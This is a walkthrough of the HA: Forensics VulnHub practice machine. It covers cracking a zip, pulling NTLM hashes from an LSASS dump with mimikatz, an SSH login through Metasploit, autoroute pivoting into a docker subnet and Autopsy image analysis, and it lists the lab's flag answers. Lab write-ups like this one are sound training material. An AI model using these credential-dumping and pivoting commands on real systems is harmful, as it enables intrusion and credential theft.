HA: FORENSICS (VulnHub practice range) walkthrough
Find the target IP:
Port scan: ports 22 and 80 are open. Browse to port 80:
Directory brute-force finds tips.txt:
Download the zip it points to; it is password-protected. The igolder directory holds the PGP key material, so take it to the online PGP decryption tool:
Crack the zip password:
Get flag2:
The archive also contains an lsass.DMP file (an LSASS process memory dump);
load it into mimikatz:
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full
This prints the user's NTLM hash:
Crack it offline (NT hashes are unsalted MD4, so they are recovered by guessing, not decrypted):
SSH in with the recovered credentials:
sudo is not usable for this user; ifconfig shows a docker interface, so there is a container network to pivot into:
Switch to msf for the SSH login and use its autoroute module to route traffic through the session:
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.198.154
set username jasoos
set password Password@1
exploit
sessions -u 1
use post/multi/manage/autoroute
set session 2
exploit
Ping-sweep the docker subnet for live hosts:
use post/multi/gather/ping_sweep
set session 2
set rhosts 172.17.0.0/24
exploit
Port-scan the host that answered:
use auxiliary/scanner/portscan/tcp
set rhosts 172.17.0.2
set ports 1-100
exploit
Check whether the FTP service allows anonymous login:
use auxiliary/scanner/ftp/anonymous
set rhosts 172.17.0.2
exploit
Drop into a shell on the session, upgrade it to a PTY, and pull the file over FTP:
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ftp 172.17.0.2
anonymous
ls
cd pub
ls
get saboot.001
Transfer the image back to the attacking machine: on the target, serve it with
python -m SimpleHTTPServer (on Python 3: python3 -m http.server)
and fetch the file from the attacker's side:
Open the image in Autopsy:
Create a case first:
After the case is created, a host is required: enter the host name and click "Add Host". Once the host exists, Autopsy asks for an image file:
Keep the defaults on the next screen and click "Add":
Analyze the image:
View the files:
Open flag:
Open creds:
Base64-decode the creds:
Switch to the other user with the decoded credentials. There are four flags in total; one is still missing, and it is hidden steganographically in the picture.
All flags:
flag1:Flag:1 {bc02d4ffbeeab9f57c5e03de1098ff31}
flag2:Flag:2 {4a3232c59ecda21ac71bebe3b329bf36}
flag3:Flag:3 {8442460f48338fe60a9497b8e0e9022f}
flag4:Flag: {9440aee508b6215995219c58c8ba4b45}